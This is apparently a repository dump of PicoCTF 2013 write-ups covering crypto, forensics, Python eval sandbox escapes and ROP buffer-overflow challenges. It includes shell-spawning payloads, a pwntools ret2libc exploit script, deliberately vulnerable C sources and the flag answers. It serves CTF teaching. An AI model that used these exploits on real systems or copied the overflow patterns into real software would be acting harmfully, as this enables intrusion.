len(choices): 32 | print "No such item!" 33 | elif not path.exists(choices[n][2]): 34 | print "No description yet, but we promise it's tasty!" 35 | else: 36 | print open(choices[n][2]).read() 37 | 38 | def show_menu(): 39 | for i in xrange(len(choices)): 40 | print "[% 2d] $% 3.2f %s" % (i, choices[i][1], choices[i][0]) 41 | 42 | while True: 43 | print "Which description do you want to read?" 44 | show_menu() 45 | print_description(input('> ')) 46 | ``` 47 | 48 | > We can see that the ability to import and call a shell has been blocked so we need to look for another way. Opening up a Python interperter from our 49 | > local machine and checking what the import path gives us reveals an answer. 50 | 51 | ``` 52 | >>> from os import path 53 | >>> dir(path) 54 | ['__all__', '__builtins__', '__doc__', '__file__', '__name__', '__package__', '_joinrealpath', '_unicode', '_uvarprog', '_varprog', 'abspath', 'altsep', 'basename', 'commonprefix', 'curdir', 'defpath', 'devnull', 'dirname', 'exists', 'expanduser', 'expandvars', 'extsep', 'genericpath', 'getatime', 'getctime', 'getmtime', 'getsize', 'isabs', 'isdir', 'isfile', 'islink', 'ismount', 'join', 'lexists', 'normcase', 'normpath', 'os', 'pardir', 'pathsep', 'realpath', 'relpath', 'samefile', 'sameopenfile', 'samestat', 'sep', 'split', 'splitdrive', 'splitext', 'stat', 'supports_unicode_filenames', 'sys', 'walk', 'warnings'] 55 | ``` 56 | 57 | > The import path contains a reference to the module os so we can simply call a shell using path. Inputting the following commands gives us our answer 58 | ``` 59 | > path.os.execlp('sh','sh') 60 | > ls 61 | run.sh 62 | task3.py 63 | your_flag_here 64 | > cat your_flag_here 65 | eval_is_super_OSsome 66 | ``` 67 | 68 | 69 | 70 | 71 | **Answer: eval_is_super_OSsome** 72 | 73 | ## Other write-ups and resources 74 | * [https://www.uns.vn/picoctf-2013-write-up-python-eval-3/](https://www.uns.vn/picoctf-2013-write-up-python-eval-3/) 75 | * [http://hacktracking.blogspot.com/2014/01/picoctf-2k13-python-eval-3.html](http://hacktracking.blogspot.com/2014/01/picoctf-2k13-python-eval-3.html) 76 | * [https://github.com/james9909/PracticeCTF/tree/master/picoCTF-2013/Python%20Eval%203](https://github.com/james9909/PracticeCTF/tree/master/picoCTF-2013/Python%20Eval%203) 77 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-4/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 4 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 130 5 | **Description:** 6 | 7 | > Solving the previous Python Eval probelms will help you prepare for [Python Eval 4](https://2013.picoctf.com/problems/pyeval/stage4.html) 8 | 9 | ## Write-up 10 | *None Yet* 11 | 12 | **Answer: kids_dont_code_like_this_at_home ** 13 | 14 | ## Other write-ups and resources 15 | 16 | * [http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-4.html](http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-4.html) 17 | -------------------------------------------------------------------------------- /pico-ctf-2013/python-eval-5/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Python Eval 5 2 | 3 | **Category:** Script Exploitation 4 | **Points:** 140 5 | **Description:** 6 | 7 | > A true challenge awaits you at python.picoctf.com:6365. [Source](https://2013.picoctf.com/problems/pyeval/task5.py). 8 | 9 | ## Write-up 10 | 11 | > This challenge is very simliar to Python Eval 3. We're given a Python script to exploit and the task of getting a shell on the server running it ; in order to read the flag. 12 | > The script's author has removed the ability to call __builtins__ and have given us a dictionary with an empty variable 'x'. 13 | > They also have limited us to 50 chars of eval at a time. 14 | > Our approache to solving this will be to use the empty variable 'x''s builtins to exploit this script. 15 | > The follwing commands give us our shell. 16 | 17 | ``` 18 | __builtins__[0]=x.__class__.__base__ 19 | __builtins__[1]=__builtins__[0].__subclasses__ 20 | __builtins__[2]=__builtins__[1]() 21 | __builtins__[3]=__builtins__[2][53] 22 | __builtins__[4]=__builtins__[3].__repr__ 23 | __builtins__[5]=__builtins__[4].im_func 24 | __builtins__[6]=__builtins__[5].func_globals 25 | __builtins__[7]=__builtins__[6]['linecache'] 26 | __builtins__[8]=__builtins__[7].os 27 | __builtins__[8].execl('/bin/sh','sh') 28 | ``` 29 | 30 | > The first six lines of input give us access to *im_func* 's functions. One of those functions is the func_globals function. The func_globals function returns a dictionary of a modules global scope. 31 | > The next two lines calls func_globals with the argument of the module linecache. The linecache module has the module os module in scope. 32 | > We use the last two lines to use the module os to call a shell. 33 | 34 | Finally using our shell gives us the answer 35 | ``` 36 | ls 37 | flag_for_masters 38 | run.sh 39 | task5.py 40 | cat flag_for_masters 41 | you_are_the_pyeval_master 42 | ``` 43 | 44 | **Answer: you_are_the_pyeval_master** 45 | 46 | ## Other write-ups and resources 47 | 48 | * [http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-5.html](http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-5.html) 49 | * [http://haeresy.tumblr.com/post/49832621763/python-eval-5](http://haeresy.tumblr.com/post/49832621763/python-eval-5) 50 | -------------------------------------------------------------------------------- /pico-ctf-2013/read-the-manual/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Read the Manual 2 | 3 | **Category:** Crypto 4 | **Points:** 30 5 | **Description:** 6 | 7 | > On the back of the broken panel you see a recovery [manual](tmp2xfLwN.txt). You need to find the emergency repair key in order to put the robot into `autoboot` mode, but it appears to be ciphered using a Caesar cipher. 8 | 9 | ## Write-up 10 | 11 | Quote: "*but it appears to be ciphered using a Caesar cipher*" 12 | 13 | We'll use a tool [Decrypt CAESAR Online](http://www.xarg.org/tools/caesar-cipher) 14 | 15 | With k = 10, cleartext is: 16 | 17 | ``` 18 | Instruction manual for Toaster Model 0X653F IMPORTANT: To enter automatic recovery mode, 19 | enter the following recovery key 'tamwxxgkqzac' Boolean logic and IPv0,[...] 20 | ``` 21 | 22 | **Answer:** tamwxxgkqzac 23 | 24 | ## Other write-ups and resources 25 | 26 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/robomunication/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Robomunication 2 | 3 | **Category:** Cryptography 4 | **Points:** 80 5 | **Description:** 6 | 7 | > We recorded the following [communication](https://2013.picoctf.com/problems/robo.mp3) between two robots. Find out what evil things they are plotting, and recover their secret key! 8 | > 9 | > [Offline file](robo.mp3) 10 | 11 | ## Write-up 12 | 13 | This challenge involves transcribing and decoding Morse code. 14 | 15 | Listening to the supplied mp3 we can hear the robots speaking in "beep"s and "boop"s. Transcribing those beeps and boops and decoding them using a [Morse code chart](https://upload.wikimedia.org/wikipedia/commons/b/b5/International_Morse_Code.svg) gives us our answer. 16 | 17 | **Answer: BOOPBEEP** 18 | 19 | ## Other write-ups and resources 20 | 21 | * none yet 22 | -------------------------------------------------------------------------------- /pico-ctf-2013/robomunication/robo.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/robomunication/robo.mp3 -------------------------------------------------------------------------------- /pico-ctf-2013/rop-1/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: ROP 1 2 | 3 | **Category:** Binary Exploitation 4 | **Points:** 95 5 | **Description:** 6 | 7 | > ROP is a classic technique for getting around address randomization and 8 | > non-executable memory. This sequence will teach you the basics. 9 | > 10 | > Problem available on the shell machine in /problems/ROP_1_fa6168f4d8eba0eb , 11 | > downloadable [here](https://2013.picoctf.com/problems/rop1-fa6168f4d8eba0eb) with source [here](https://2013.picoctf.com/problems/rop1-fa6168f4d8eba0eb.c). 12 | > 13 | > 14 | 15 | ## Write-up 16 | Looking at the C code, there are two interesting functions: 17 | ```C 18 | int not_called() { 19 | return system("/bin/bash"); 20 | } 21 | 22 | void vulnerable_function() { 23 | char buf[128]; 24 | read(STDIN_FILENO, buf, 256); 25 | } 26 | ``` 27 | As you may have guessed, the vulnerability is in the `vulnerable_function()`. 28 | The function calls `read()` with a size of 256, whereas the buffer only has 128 29 | spaces to fill. This is what is referred to as a buffer overflow, and we're 30 | going to use it to get a shell. 31 | 32 | The main difference between the overfllow problems and ROP is that ROP type 33 | problems have NX/ASLR enabled, and sometimes other protections. This means that 34 | libc and stack addresses are random, and that no memory is simultaneously 35 | writeable and executable. RIP shellcode. 36 | 37 | Luckily, `not_called()` does most of the heavy lifting for us. Since 38 | ASLR **does not** randomize the addresses in the executable, we can reliably 39 | supply the address of `not_called()` and get a shell! 40 | 41 | Some quick scratchwork shows that $eip is under our control after 140 bytes 42 | have been supplied: 43 | 44 | ``` 45 | python -c 'print "A"\*140 + "BBBB"' | strace ./rop1-fa6168f4d8eba0eb 46 | ... 47 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- 48 | ``` 49 | 50 | Now, instead of "BBBB" we're going to try something more useful. We need the 51 | address of `not_called()`. We can run: 52 | ```objdump -d rop1-fa6168f4d8eba0eb | grep "not_called"``` 53 | which yields `080484a4 :` 54 | The address is `0x080484a4`! However, we have to convert that address into an 55 | escape sequence and to litte endian. Thus: 56 | ``` 57 | python -c 'print "A"\*140 + "\xa4\x84\x04\x08"'| ./rop1-fa6168f4d8eba0eba 58 | ``` 59 | should work. 60 | 61 | However, as indicated in the SMALL_HINT file given to us, it will exit right 62 | away. Finally: 63 | ``` 64 | (python -c 'print "A"\*140 + "\xa4\x84\x04\x08"';cat )| ./rop1-fa6168f4d8eba0eb 65 | ``` 66 | will get you a shell! 67 | 68 | **Note:** This was solved locally on my machine. When using the PicoCTF shell, 69 | the name of the binary is simply "rop1". The final command would change to: 70 | ``` 71 | python -c 'print "A"\*140 + "\xa4\x84\x04\x08"';cat )| ./rop1 72 | ``` 73 | 74 | pwn. 75 | 76 | ## Other write-ups and resources 77 | 78 | * none yet 79 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-1/SMALL_HINT: -------------------------------------------------------------------------------- 1 | Hint: It is really important not to close standard in: a common trick is to do 2 | 3 | echo -ne "my_exploit_string" > ~/some_random_file 4 | cat ~/some_random_file /dev/stdin | ./rop1 5 | 6 | Alternatively, 7 | 8 | cat <(python -c 'print "my_exploit_string"') - | ./rop1 9 | 10 | Otherwise, you will launch a shell, but standard in will be closed, so it'll 11 | just exit immediately, which is not much use at all! 12 | 13 | Good luck! 14 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-1/rop1-fa6168f4d8eba0eb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-1/rop1-fa6168f4d8eba0eb -------------------------------------------------------------------------------- /pico-ctf-2013/rop-1/rop1.c: -------------------------------------------------------------------------------- 1 | #undef _FORTIFY_SOURCE 2 | #include 3 | #include 4 | #include 5 | 6 | int not_called() { 7 | return system("/bin/bash"); 8 | } 9 | 10 | void vulnerable_function() { 11 | char buf[128]; 12 | read(STDIN_FILENO, buf, 256); 13 | } 14 | 15 | void be_nice_to_people() { 16 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 17 | // sure we don't drop privs if we exec bash, (ie if we call system()). 18 | gid_t gid = getegid(); 19 | setresgid(gid, gid, gid); 20 | } 21 | 22 | int main(int argc, char** argv) { 23 | be_nice_to_people(); 24 | vulnerable_function(); 25 | write(STDOUT_FILENO, "Hello, World\n", 13); 26 | } 27 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-2/rop2-20f65dd0bcbe267d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-2/rop2-20f65dd0bcbe267d -------------------------------------------------------------------------------- /pico-ctf-2013/rop-2/rop2-20f65dd0bcbe267d.c: -------------------------------------------------------------------------------- 1 | #undef _FORTIFY_SOURCE 2 | #include 3 | #include 4 | #include 5 | 6 | char * not_used = "/bin/bash"; 7 | 8 | int not_called() { 9 | return system("/bin/date"); 10 | } 11 | 12 | void vulnerable_function() { 13 | char buf[128]; 14 | read(STDIN_FILENO, buf, 256); 15 | } 16 | 17 | void be_nice_to_people() { 18 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 19 | // sure we don't drop privs if we exec bash, (ie if we call system()). 20 | gid_t gid = getegid(); 21 | setresgid(gid, gid, gid); 22 | } 23 | 24 | int main(int argc, char** argv) { 25 | be_nice_to_people(); 26 | vulnerable_function(); 27 | write(STDOUT_FILENO, "Hello, World\n", 13); 28 | } 29 | 30 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-3/rop3-7f3312fe43c46d26: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-3/rop3-7f3312fe43c46d26 -------------------------------------------------------------------------------- /pico-ctf-2013/rop-3/rop3-7f3312fe43c46d26.c: -------------------------------------------------------------------------------- 1 | #undef _FORTIFY_SOURCE 2 | #include 3 | #include 4 | #include 5 | 6 | void vulnerable_function() { 7 | char buf[128]; 8 | read(STDIN_FILENO, buf,256); 9 | } 10 | 11 | void be_nice_to_people() { 12 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 13 | // sure we don't drop privs if we exec bash, (ie if we call system()). 14 | gid_t gid = getegid(); 15 | setresgid(gid, gid, gid); 16 | } 17 | 18 | int main(int argc, char** argv) { 19 | be_nice_to_people(); 20 | vulnerable_function(); 21 | write(STDOUT_FILENO, "Hello, World\n", 13); 22 | } 23 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-3/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context(arch='i386', os='linux') 3 | #conventions for pwntools ^ 4 | 5 | first_part = ("A"*140 + "\xa0\x83\x04\x08" + "\x74\x84\x04\x08" 6 | + "\x01\x00\x00\x00" + "\x00\xa0\x04\x08" + "\x04\x00\x00\x00" ) 7 | # our exploit so far ^ 8 | r = process("./rop3-7f3312fe43c46d26", shell=True) #executes the binary 9 | r.sendline(first_part ) #feeds the exploit to the binary 10 | a=unpack(r.recv(4)) #gets the four bytes we leaked from the GOT 11 | print hex(a) 12 | system_address=a-0x9aa40 13 | binsh_address = a+0x85e54 14 | 15 | r.sendline("A"*140+pack(system_address)+"JUNK"+pack(binsh_address)) 16 | """ The above line sends 140 bytes of padding, the little endian form of 17 | system_address, a bogus return address, and the little endian form of the 18 | address of /bin/sh. The pack function just turns the integer into an escape 19 | sequence for us 20 | """ 21 | r.interactive() # This just enables you to type things into your shell :) 22 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-4/SMALL_HINT: -------------------------------------------------------------------------------- 1 | oops, we messed up and use strcpy instead of strcat - but it's still solvable 2 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-4/rop4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-4/rop4 -------------------------------------------------------------------------------- /pico-ctf-2013/rop-4/rop4.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char exec_string[20]; 6 | 7 | void exec_the_string() { 8 | execlp(exec_string, exec_string, NULL); 9 | } 10 | 11 | void call_me_with_cafebabe(int cafebabe) { 12 | if (cafebabe == 0xcafebabe) { 13 | strcpy(exec_string, "/sh"); 14 | } 15 | } 16 | 17 | void call_me_with_two_args(int deadbeef, int cafebabe) { 18 | if (cafebabe == 0xcafebabe && deadbeef == 0xdeadbeef) { 19 | strcpy(exec_string, "/bin"); 20 | } 21 | } 22 | 23 | void vulnerable_function() { 24 | char buf[128]; 25 | read(STDIN_FILENO, buf, 512); 26 | } 27 | 28 | void be_nice_to_people() { 29 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 30 | // sure we don't drop privs if we exec bash, (ie if we call system()). 31 | gid_t gid = getegid(); 32 | setresgid(gid, gid, gid); 33 | } 34 | 35 | int main(int argc, char** argv) { 36 | exec_string[0] = '\0'; 37 | be_nice_to_people(); 38 | vulnerable_function(); 39 | } 40 | -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: RSA 2 | 3 | **Category:** Crypto 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Math is cool! Use the RSA algorithm to decode the secret message, c, p, q, and e are parameters for the RSA algorithm. [Problem](https://2013.picoctf.com/problems/rsa.txt) 8 | > 9 | > [offline file](rsa.txt) 10 | 11 | ## Write-up 12 | 13 | What is RSA algorithm? [Wikipedia](http://en.wikipedia.org/wiki/RSA_(cryptosystem)) 14 | 15 | We will focus to "Key generation": 16 | 17 | **1. Choose two distinct prime numbers p and q.** 18 | 19 | * For security purposes, the integers p and q should be chosen at random, and should be of similar bit-length. Prime integers can be efficiently found using a primality test. 20 | 21 | **2. Compute n = pq.** 22 | 23 | * n is used as the modulus for both the public and private keys. Its length, usually expressed in bits, is the key length. 24 | 25 | **3. Compute `φ(n) = φ(p)φ(q) = (p − 1)(q − 1) = n - (p + q -1)`, where φ is Euler's totient function.** 26 | 27 | **4. Choose an integer e such that 1 < e < φ(n) and gcd(e, φ(n)) = 1; i.e., e and φ(n) are coprime.** 28 | 29 | * e is released as the public key exponent. 30 | * e having a short bit-length and small Hamming weight results in more efficient encryption – most commonly 216 + 1 = 65,537. However, much smaller values of e (such as 3) have been shown to be less secure in some settings. 31 | 32 | **5. Determine d as d ≡ e−1 (mod φ(n)); i.e., d is the multiplicative inverse of e (modulo φ(n)).** 33 | 34 | * This is more clearly stated as: solve for d given `d*e ≡ 1 (mod φ(n))` 35 | * This is often computed using the extended Euclidean algorithm. Using the pseudocode in the Modular integers section, inputs a and n correspond to e and φ(n), respectively. 36 | * d is kept as the private key exponent. 37 | 38 | Use module gmpy2 in python2: 39 | 40 | ```python 41 | import gmpy2 42 | 43 | [...] 44 | 45 | invert(x, m) 46 | # invert(x, m) returns y such that x * y == 1 modulo m, or 0 if no such y exists. 47 | 48 | [...] 49 | ``` 50 | 51 | Install [gmpy2](https://code.google.com/p/gmpy/downloads/list) is required. 52 | 53 | Code: 54 | 55 | ```python 56 | #!/usr/bin/python2 57 | import gmpy2 58 | 59 | p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483 60 | q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407 61 | e = 65537 62 | c = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034 63 | t = (p-1)*(q-1) 64 | n = p*q 65 | 66 | # returns d such that e * d == 1 modulo t, or 0 if no such y exists. 67 | d = gmpy2.invert(e,t) 68 | 69 | # Decryption 70 | m = pow(c,d,n) 71 | print "Solved ! m = %d" % m 72 | ``` 73 | 74 | **Answer:** 5577446633554466577768879988 75 | 76 | ## Other write-ups and resources 77 | 78 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/rsa.txt: -------------------------------------------------------------------------------- 1 | p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483 2 | q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407 3 | e = 65537 4 | c = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034 5 | 6 | Use RSA to find the secret message 7 | -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | import gmpy2 3 | 4 | p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483 5 | q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407 6 | e = 65537 7 | c = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034 8 | t = (p-1)*(q-1) 9 | n = p*q 10 | 11 | # returns d such that e * d == 1 modulo t, or 0 if no such y exists. 12 | d = gmpy2.invert(e,t) 13 | 14 | # Decryption 15 | m = pow(c,d,n) 16 | print "Solved ! m = %d" % m -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/solve2.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rsa/solve2.sh -------------------------------------------------------------------------------- /pico-ctf-2013/second-contact/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Second Contact 2 | 3 | **Category:** Forensic 4 | **Points:** 85 5 | **Description:** 6 | 7 | > As you're bumming around the Kuiper Belt, you catch an [incoming transmission](https://2013.picoctf.com/problems/kuiper.pcap) from a distant source. They seem to be scanning the area, looking for something... Maybe you should try to find it first. 8 | > 9 | > This trace file is also available in cloudshark [here](http://www.cloudshark.org/captures/f0741cdfee53) 10 | > 11 | > [Offline file](kuiper.pcap) 12 | 13 | ## Write-up 14 | 15 | Open file with Wireshark. 16 | 17 | Quote: *They seem to be scanning the area, looking for something...* 18 | 19 | We will focus to search engine (Google, Bing, etc). 20 | 21 | When Follow TCP Stream, we see `packet 1018`: 22 | 23 | ``` 24 | http://www.bing.com/search?q=smashing+the+stack+for+fun+and+profit&form=MOZSBR&pc=MOZI 25 | ``` 26 | 27 | They were looking for something that involved to "smashing+the+stack+for+fun+and+profit" 28 | 29 | This is a magazine,the first things that we things is author, contents, ... 30 | 31 | Suprising, flag is the name of author of magazine. 32 | 33 | **Answer:** Aleph One 34 | 35 | ## Other write-ups and resources 36 | 37 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/second-contact/kuiper.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/second-contact/kuiper.pcap -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Spaceport Map 2 | 3 | **Category:** Trivival 4 | **Points:** 55 5 | **Description:** 6 | 7 | > The map of the spaceport is hard to parse, but you're pretty sure there is some hidden information, somewhere... 8 | > 9 | > ![](spaceportmap.gif) 10 | 11 | ## Write-up 12 | 13 | spaceportmap.gif is a animated image (will include some other frames). 14 | 15 | Use [Jeffrey's Exif Viewer Tool](http://regex.info/exif.cgi) to extract all frames of it. 16 | 17 | ![](info.png) 18 | 19 | We can see Animated frame #4: 20 | 21 | ![frame #4](frame4.gif) 22 | 23 | ``` 24 | Key: Do passports let you fly interstellar? 25 | ``` 26 | 27 | **Answer:** Do passports let you fly interstellar 28 | 29 | ## Other write-ups and resources 30 | 31 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/frame4.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spaceport-map/frame4.gif -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spaceport-map/info.png -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/spaceportmap.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spaceport-map/spaceportmap.gif -------------------------------------------------------------------------------- /pico-ctf-2013/spamcarver/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Spamcarver 2 | 3 | **Category:** Forensic 4 | **Points:** 70 5 | **Description:** 6 | 7 | > While exploring an alien tomb, you find an ancient jpg of [an ancient can of SPAM](https://2013.picoctf.com/problems/spamcarver.jpg). It seems valueless, but the guardbots really want it back, so perhaps there's something more here than meets the eye. Maybe it's cursed, or hexed, if you will? 8 | > 9 | > [Offline file](spamcarver.jpg) 10 | 11 | ## Write-up 12 | 13 | View file in hex: 14 | 15 | ``` 16 | 00000000 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 ÿØÿà..JFIF...... 17 | 00000010 00 01 00 00 FF FE 00 3B 20 20 20 20 20 20 20 20 ....ÿþ.; 18 | 19 | [...] 20 | 21 | 0000CB80 AB D1 5D 7F DA 93 FE 5F C7 FE 00 1F FF D9 50 4B «Ñ].Ú“þ_Çþ..ÿÙPK 22 | 0000CB90 03 04 14 00 02 00 08 00 F4 02 9F 41 D4 50 D9 9C ........ô.ŸAÔPÙœ 23 | 0000CBA0 E3 2D 00 00 99 2E 00 00 08 00 1C 00 20 20 20 20 ã-..™....... 24 | 0000CBB0 20 20 20 20 55 54 09 00 03 8B 4B E1 50 8C 4B E1 UT...‹KáPŒKá 25 | 0000CBC0 50 75 78 0B 00 01 04 E8 03 00 00 04 E8 03 00 00 Pux....è....è... 26 | [...] 27 | ``` 28 | 29 | We will focus to file signature, `FF D8 FF E0 00 10 4A 46 49 46` is JPEG. 30 | `50 4B 03 04` is PKZIP. Try extract, in Windows, seem to be error, file can't read. 31 | Because file name has white space, we try extract in Linux. 32 | 33 | ``` 34 | $ unzip spamcarver.jpg 35 | 36 | # rename file to display name 37 | $ mv \ \ \ \ \ \ \ \ newfile.new 38 | 39 | $ file newfile.new 40 | newfile.new; JPEG image data, JFIF standard 1.01 41 | ``` 42 | 43 | Open newfile.new with image viewer program to see flag. 44 | 45 | ![](newfile.new.jpg) 46 | 47 | **Answer:** 7adf6f07e0810003c585a7be97868a90 48 | 49 | ## Other write-ups and resources 50 | 51 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/spamcarver/newfile.new.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spamcarver/newfile.new.jpg -------------------------------------------------------------------------------- /pico-ctf-2013/spamcarver/spamcarver.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spamcarver/spamcarver.jpg -------------------------------------------------------------------------------- /pico-ctf-2013/technician-challenge/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Technician Challenge 2 | 3 | **Category:** Trivia 4 | **Points:** 30 5 | **Description:** 6 | 7 | > The spaceport technician waves to you and you approach him. He tells you that he has noticed you walking around suspiciously. He adds that he knows the door code and is willing to give it to you for answering a small trivia question. 8 | 9 | >> For what kind of car was the first unlocked iPhone traded? 10 | 11 | ## Write-up 12 | 13 | Google keyword `For what kind of car was the first unlocked iPhone traded?` for too many results. 14 | 15 | **Answer:** Nissan 350Z 16 | 17 | ## Other write-ups and resources 18 | 19 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/trivial/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Trivial 2 | 3 | **Category:** Crypto 4 | **Points:** 45 5 | **Description:** 6 | 7 | > An unlocked terminal is displaying the following: 8 | > 9 | > > Encryption complete, ENC(???,T0pS3cre7key) = Bot kmws mikferuigmzf rmfrxrwqe abs perudsf! Nvm kda ut ab8bv_w4ue0_ab8v_DDU 10 | > 11 | > You poke around and find this interesting [file](https://2013.picoctf.com/problems/encrypt.py). 12 | > 13 | > [offline file](encrypt.py) 14 | 15 | ## Write-up 16 | 17 | Run encrypt.py: "Usage: D:\Downloads\encrypt.py SECRET_KEY PLAINTEXT" 18 | 19 | Quote: 20 | 21 | ```python 22 | print "Encryption complete, ENC(%s,%s) = %s"%(plaintext,key,ciphertext) 23 | ``` 24 | 25 | We can know: 26 | 27 | * key = "T0pS3cre7key" 28 | * ciphertext = "Bot kmws mikferuigmzf rmfrxrwqe abs perudsf! Nvm kda ut ab8bv_w4ue0_ab8v_DDU" 29 | 30 | ```python 31 | plaintext = sys.argv[2] 32 | 33 | ciphertext = "" 34 | for i in range(len(plaintext)): 35 | rotate_amount = keychars.index(key[i%len(key)]) 36 | if plaintext[i] in alphaL: 37 | enc_char = ord('a') + (ord(plaintext[i])-ord('a')+rotate_amount)%26 38 | elif plaintext[i] in alphaU: 39 | enc_char = ord('A') + (ord(plaintext[i])-ord('A')+rotate_amount)%26 40 | elif plaintext[i] in num: 41 | enc_char = ord('0') + (ord(plaintext[i])-ord('0')+rotate_amount)%10 42 | else: 43 | enc_char = ord(plaintext[i]) 44 | ciphertext = ciphertext + chr(enc_char) 45 | ``` 46 | 47 | We can see rotate_amount is a real key. Encryption is add it, so decryption is sub it. 48 | 49 | Make easy change: 50 | 51 | ```python 52 | plaintext = sys.argv[2] 53 | 54 | ciphertext = "" 55 | for i in range(len(plaintext)): 56 | rotate_amount = keychars.index(key[i%len(key)]) 57 | if plaintext[i] in alphaL: 58 | enc_char = ord('a') + (ord(plaintext[i])-ord('a')-rotate_amount)%26 59 | elif plaintext[i] in alphaU: 60 | enc_char = ord('A') + (ord(plaintext[i])-ord('A')-rotate_amount)%26 61 | elif plaintext[i] in num: 62 | enc_char = ord('0') + (ord(plaintext[i])-ord('0')-rotate_amount)%10 63 | else: 64 | enc_char = ord(plaintext[i]) 65 | ciphertext = ciphertext + chr(enc_char) 66 | ``` 67 | 68 | Now input ciphertext replace for plaintext: "Usage: D:\Downloads\encrypt.py SECRET_KEY CIPHERTEXT" 69 | 70 | ``` 71 | [...]You hawe successfully decrypwed the message! The key is th4ts_w0rs3_th4n_DES 72 